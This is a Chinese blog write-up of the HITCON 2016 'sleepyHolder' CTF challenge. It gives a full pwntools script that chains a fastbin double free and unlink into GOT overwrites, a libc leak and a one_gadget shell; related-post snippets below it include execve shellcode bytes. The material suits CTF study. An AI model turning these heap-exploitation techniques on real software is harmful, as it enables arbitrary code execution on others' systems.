[fast_bin_consoli + unlink]sleepyHolder_hitcon_2016

最新推荐文章于 2021-11-10 13:36:35 发布
最新推荐文章于 2021-11-10 13:36:35 发布
阅读量87 收藏
点赞数
分类专栏: CTF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/huzai9527/article/details/117266497
版权

[fast_bin_consoli + unlink]sleepyHolder_hitcon_2016

1. ida分析

  1. add函数

在这里插入图片描述

  1. delete函数

    在这里插入图片描述

  2. unlink 需要控制的全局指针的位置

    在这里插入图片描述

2. 思路

  1. 先申请两个small和big chunk,释放small chunk,申请huge chunk,触发consolidate,再次释放small chunk,触发double free
  2. 申请small chunk,同时构造fake chunk,释放big chunk,触发unlink,此时edit(small),就是编辑small_ptr指针
  3. Unlink 之后,small_ptr指向small_ptr-0x18的地址,通过编辑small_chunk,将big_ptr改为free_got,将small_ptr改为small_ptr-0x10,以便下次修改atoi_got
  4. 通过编辑big_chunk,将free_got修改为puts_plt
  5. 再次编辑small_chunk,修改big_ptr和small_ptr为atoi_got
  6. 释放big chunk,获得libc基址
  7. 编辑small_chunk,修改atoi_got为onegadget

3. exp

from pwn import *
from LibcSearcher import *
context.terminal = ['gnome-terminal', '-x', 'sh', '-c']
context(arch='amd64',os='linux',log_level='debug')
myelf = ELF('./sleepyHolder_hitcon_2016')
#myelf   = ELF("./libc-2.23.so")
#p     = process(myelf.path,env={"LD_PRELOAD" : libc.path})
p = process(myelf.path)
#p = remote('node3.buuoj.cn',25646)
local_libc_64  = ELF("/lib/x86_64-linux-gnu/libc.so.6")
local_libc_32  = ELF("/lib/i386-linux-gnu/libc.so.6")

# functp.s for quick script
s       = lambda data               :p.send(data)       
sa      = lambda delim,data         :p.sendafter(delim, data) 
sl      = lambda data               :p.sendline(data) 
sla     = lambda delim,data         :p.sendlineafter(delim, data) 
r       = lambda numb=4096          :p.recv(numb)
ru      = lambda delims             :p.recvuntil(delims)
pa      = lambda                   :p.interactive()
# misc functp.s
uu32    = lambda data   :u32(data.ljust(4, b'\0'))
uu64    = lambda data   :u64(data.ljust(8, b'\0'))
leak    = lambda name,addr :log.success('{} : {:#x}'.format(name, addr))

def debug():
	#gdb.attach(p)
	#pause()
	pass

def add(type,content):
   p.sendlineafter('3. Renew secret\n','1')
   p.sendlineafter('What secret do you want to keep?',str(type))
   p.sendafter('Tell me your secret:',content)
 
def delete(type):
   p.sendlineafter('3. Renew secret\n','2')
   p.sendlineafter('Which Secret do you want to wipe?',str(type))
 
def edit(type,content):
   p.sendlineafter('3. Renew secret\n','3')
   p.sendlineafter('Which Secret do you want to renew?',str(type))
   p.sendafter('Tell me your secret:',content)


#double free
small_bin = 0x6020d0
add(1,'a'*0x20)
add(2,'b'*0x20)
delete(1)
add(3,'c'*0x30)
delete(1)
debug()

#modify small_ptr
payload = p64(0) + p64(0x21) + p64(small_bin-0x18) + p64(small_bin-0x10) + p64(0x20)
add(1,payload)
delete(2)
debug()

#change free to puts
payload = 'p'*0x8 + p64(myelf.got['free']) + p64(0) + p64(small_bin - 0x10) + p64(1)
edit(1,payload)
edit(2,p64(myelf.plt['puts']))
debug()


#leak_libc
payload = p64(myelf.got['atoi']) + p64(0) + p64(myelf.got['atoi'])
edit(1,payload)
delete(2)
atoi =  uu64(p.recvuntil('\x7f')[-6:])
libc = LibcSearcher('atoi',atoi)
libc_base = atoi - libc.dump('atoi')
log.success('libc_base==>'+hex(libc_base))
one = libc_base + 0xf1247
debug()


#change atoi to onegadget
edit(1,p64(one))
debug()


p.interactive()
huzai9527
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
CMARRT_python:用于峰值调用的CMARRT算法的Python实现
02-10
CMARRT算法的Python实现 该算法最初是为分析ChIP芯片数据而开发的: Kuan PF,Chun H,Keles S. CMARRT:一种通过整合相关结构来分析切片阵列中ChIP芯片数据的工具。... [--sample_frac SAMPLE_FRAC] [--consoli
对经济和金融词典的细粒度、基于方面的情绪分析-研究论文
06-10
由于大数据的可用性、计算能力的增长和人工智能 (AI) 技术的进步,在过去的 20 年中,语义 Web 技术的采用大幅增加。 尖端的语义技术现在能够在各种实际应用中更准确地捕捉情绪,包括经济和金融预测。...
tipask二次开发总结_二次开发自我总结
weixin_35712571的博客
12-29 270
theparty'sfinestyle,carryforwardthetraditionalChinesevirtues,practicingtheSocialistcorevalues,vigorouslycarryforwardthespiritofJiaoYulu,HongqiCanalspiritandspiritofpersistence...
dcrs 端口配ip_三层交换机端口IP地址配置方法
weixin_39723655的博客
12-24 184
In2016CountyEconomicworkshopShangofspeechcomradeare:thiscountyeconomicworkshopofmaintaskis,fullimplementimplementationCentral,andprovincial,andmunicipaleconomicworkshopandprov...
apache的es的原理_关于Apache服务器的工作原理解析
weixin_39728544的博客
01-13 243
onjunctionwiththebeginningofthe95anniversaryactivities,focusedschedule1partylecture.EncouragesthepartybranchSecretaryofthepracticeofpartymembersgiveaPartylecture.Productionlineof...
BAPI_ACC_DOCUMENT_POST&nbs…
森林木的博客
04-22 660
原文地址:cross company code posting">BAPI_ACC_DOCUMENT_POST cross company code posting作者:sap侠之大者使用BAPI_ACC_DOCUMENT_POST,做跨公司代码的凭证过账,发现报错 message F5 583 Business transaction cannot be processed by consoli
matlabfig生成代码-anatomy:博士论文分析代码:纹状体连接学
05-26
2016)eLife。 5,e19103。 数据源: :Hunnicutt,BJ等。 (2014)。 。 自然神经科学。 17,1276–1285。 :哦,SW等。 (2014)。 。 自然508,207–214。 皮层皮层数据并与其他网络数据集成: 和 文件名 ...
XDoc2AsciiDoc:小型实用程序,可帮助将xDoc文档转换为AsciiDoc文档
05-22
java -cp ./x2a.jar com.consoli.x2a.XDoc2AsciiDoc xdoc asciidoc 从xdoc文件夹中读取.xdoc文件,在C:/ temp文件夹中创建.asc文件 java -cp ./x2a.jar com.consoli.x2a.XDoc2AsciiDoc xdoc C:/temp 如果指定的...
vue-loader中引入模板预处理器的实现
12-29
vue-loader 是一个 webpack 的 loader,可以将指定格式编写的 Vue 组件转换为 JavaScript模块 同时,vue-loader 支持使用非默认语言,通过设置语言块的lang属性,就可以使用指定的预...v14 或更低版本使用 consoli
ctf-pwn-patchelf-用题目给的libc运行二进制文件
huzai9527的博客
07-07 5004
用给定的libc进行调试 首先根据题目给你的libc,查找相应版本的连接器 然后去glibc-all-in-one中下载相应的ld文件 glibc-all-in-one安装步骤 https://github.com/matrix1001/glibc-all-in-one 使用 查看各unbuntu版本的glibc ./update_list cat list 下载对应版本的glibc ./download 2.27-3ubuntu1_amd64 下载好的glibc在l
[_IO_FILE] 原理解析
huzai9527的博客
11-10 3666
FSOP CFF-WIKI中有如下描述 FSOP 的核心思想就是劫持_IO_list_all 的值来伪造链表和其中的_IO_FILE 项,但是单纯的伪造只是构造了数据还需要某种方法进行触发。FSOP 选择的触发方法是调用_IO_flush_all_lockp,这个函数会刷新_IO_list_all 链表中所有项的文件流,相当于对每个 FILE 调用 fflush,也对应着会调用_IO_FILE_plus.vtable 中的_IO_overflow。 触发条件 梳理一下 FSOP 利用的条件,首先需
IDA修复跳表
huzai9527的博客
11-08 1749
一、 IDA打开遇到JUMP CS命令 这是由于GCC在编译超过5个switch的结构时会用跳表进行优化,变成上面的样子 二、使用EDIT --> other --> specify switch 将光标打在JUMP命令上按TAB键切换到汇编,然后才能进行编辑 我解释一下各个参数的意义 Address of Jump table:跳表的地址,cmp eax 5,之后跳到的地址,这里就是0x69E0 Number of elements:switch 的个数,先前cmp eax 5,加
orw_shellcode_模板
huzai9527的博客
05-23 1448
orw 64位 shellcode shellcode = "\x6a\x3b\x58\x99\x52\x48\xbb\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x53\x54\x5f\x52\x57\x54\x5e\x0f\x05" #pwntools context.arch = elf.arch shellcode = asm(shellcreaft.sh()) orw #pwntools shellcode = '' shellcode += shellcraft.open
glibc中free函数详解
huzai9527的博客
05-27 866
__libc_free详解(tcache 略) 1. 检查是否存在 hook函数,如果有就执行 void __libc_free (void *mem) { mstate ar_ptr; mchunkptr p; /* chunk corresponding to mem */ /* 1. 关于__free_hook,释放时会检查其会否为NULL,否的话就执行相应的函数 2. __free_hook指向的函数,其调用的参数,为chunk中的内容
ubuntu 18 CTF 环境搭建
huzai9527的博客
05-17 795
ubuntu 18 CTF 环境搭建 一、换源 sudo gedit /etc/apt/sources.list 将下面的内容替换文件内容 # 中科大源 deb https://mirrors.ustc.edu.cn/ubuntu/ bionic main restricted universe multiverse deb-src https://mirrors.ustc.edu.cn/ubuntu/ bionic main restricted universe multiverse deb
【exit hook】ciscn_2019_n_7
huzai9527的博客
04-19 608
【exit hook】ciscn_2019_n_7 1.ida分析 输入666获得puts地址,计算libc偏移 输入name的时候,可以输入16个字节,但是只有前8个字节可用,后面8个字节是content的指针 2.思路 通过puts计算libc的偏移 溢出到content指针,修改为exit_hook的地址 edit将exit_hook改为onegadget 3.exp from pwn import * p = remote('node3.buuoj.cn',28010)
【large bin 】源码解析
huzai9527的博客
11-09 563
large bin attack large bin的结构 网找了好久,没有一个形象的理解确实读源码不方便,找了好久,mkx7师傅的这篇文章总结的及其好! largebinbin操作 当确定victim的大小在largebin范围后,如何将victim插入larbin的过程如下 首先判断largebin 是否为空 如果空的直接设置victim为victim size大小的chunk 头节点,并将fd_nextsize和bk_nextsize设置为victm 如果largebin
栈迁移
huzai9527的博客
02-22 528
栈迁移 1.为什么需要栈转移? 在栈空间不够存放payload的情况下,需要一个新的地址空间存放payload 开启PIE保护,栈地址未知,我们可以将栈劫持到已知的区域 2.概念 劫持栈的rsp(ESP),使其指向其他位置,形成一个伪造的栈,在此栈中做ROP 3.必要的gadget pop ebp;ret 释放EBP,并连接伪造的栈 leave;ret 更改ESP,指向后续的payload 4.原理 通过 pop ebp;ret + 伪造的栈让程序直接跳转到伪造的栈里面,然后为了保持栈平衡
[tcache double free] Mynote
huzai9527的博客
07-11 469
[tcache double free] 1. ida分析 存在double free 以及 uaf 题目给的libc是早期的可以进行double free的2.27版本 关于如何使用题目提供的libc进行调试,看ctf-pwn-patchelf-用题目给的libc运行二进制文件 2.思路 先填满tcache,使用unstored bin泄漏libc的地址(这里只能申请9个chunk,可以将chunk 0 释放7次,填满tcache) 利用double free修改free_hook为system

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值